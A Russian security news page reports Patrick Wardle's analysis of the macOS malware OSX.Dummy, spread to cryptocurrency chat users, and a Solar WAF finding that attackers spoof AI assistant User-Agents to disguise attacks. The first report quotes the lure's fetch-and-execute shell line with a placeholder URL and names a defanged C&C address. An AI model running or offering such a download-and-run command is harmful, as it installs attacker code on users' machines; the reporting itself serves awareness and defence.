Новый вредонос для macOS атакует криптовалютное сообщество

Новый вредонос для macOS атакует криптовалютное сообщество

Новый вредонос для macOS атакует криптовалютное сообщество

Известный исследователь в области безопасности Патрик Уордл проанализировал новую вредоносную программу для систем macOS, которая атакует криптовалютное сообщество. Вредонос получил имя OSX.Dummy.

«Мне удалось зафиксировать несколько атак на пользователей macOS, они брали свое начало в чатах Slack или Discord, в которых общалось криптовалютное сообщество. В этих чатах люди делятся небольшими сниппетами, чем и воспользовались злоумышленники — вредоносный бинарник загружается и выполняется на компьютерах ничего не подозревающих жертв», — объясняет Ремко Верхов, обнаруживший OSX.Dummy эксперт.

Верхоф уточнил, что люди, маскирующиеся под администраторов групповых чатов, делились небольшими фрагментами кода, который приводил к загрузке и выполнению вредоносной программы. Пример такого фрагмента:

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

Уордл отметил, что вредоносный двоичный файл не подписан, это значит, что он будет заблокирован GateKeeper, однако атакующие обошли это ограничение, заставляя жертв загружать и выполнять вредоносный код напрямую с помощью команд терминала.

OSX.Dummy пытается присвоить своему файлу права root, выполнив sudo-команду, однако это потребует от пользователя ввода пароля в терминале. Пароль сохраняется вредоносным кодом в папке /tmp/dumpdummy.

Затем зловред выполняет ряд операций, которые обеспечивают ему укоренение в системе и последующий автоматический запуск.

Вредоносный код также пытается подключиться к C&C-серверу 185[.]243.115.230, используя порт 1337. Если подключение проходит успешно, злоумышленник сможет выполнять команды с root-привилегиями.

«Чтобы првоерить свою систему на предмет заражения этим вредоносом, запустите KnockKnock от root. Ищите неподписанный элемент запуска com.startup.plist, выполняющий нечто с именем «script.sh»», — заключил Уордл.

Хакеры надели маски ChatGPT и DeepSeek для атак на российские сайты

Злоумышленники маскируют вредоносные запросы к веб-приложениям российских компаний под трафик популярных ИИ-ассистентов. По данным Solar WAF, в ход пошли имена DeepSeek, ChatGPT, Perplexity, Claude и Grok. Для маскировки атакующие подменяют HTTP-заголовок User-Agent, по которому сервер определяет обращающееся к нему приложение.

В запросах указывались значения DeepSeekBot, ChatGPT-User, Perplexity-User, Claude-User и GrokBot. Однако за громкими названиями скрывались сканирование уязвимостей и попытки атак.

Первые подобные обращения специалисты зафиксировали 12 августа 2026 года под видом DeepSeekBot. С 27 августа к маскараду присоединились остальные ассистенты. В июне и июле трафика с такими идентификаторами в анализируемой выборке Solar WAF не наблюдалось.

Главный расчёт злоумышленников строится на доверии. Владельцы сайтов всё чаще воспринимают ИИ-агентов как источник клиентов, лидов и полезного трафика, поэтому могут применять к ним менее строгие правила. Проблема в том, что User-Agent не является удостоверением личности: написать там ChatGPT-User способен кто угодно.

Согласно данным «Солара», в 53% выявленных случаев злоумышленники пытались проводить DNS Rebinding, способный заставить систему обращаться к внутренним ресурсам. Ещё 12% запросов были связаны с попытками утечки данных, 4% — с Path Traversal для доступа к файлам за пределами разрешённых каталогов. Остальные 31% включали другие техники, в том числе старые добрые SQL-инъекции.

Эксперты прогнозируют дальнейшее усложнение атак с применением ИИ, включая уникальные сценарии, которые могут не распознаваться сигнатурами.

RSS: Новости на портале Anti-Malware.ru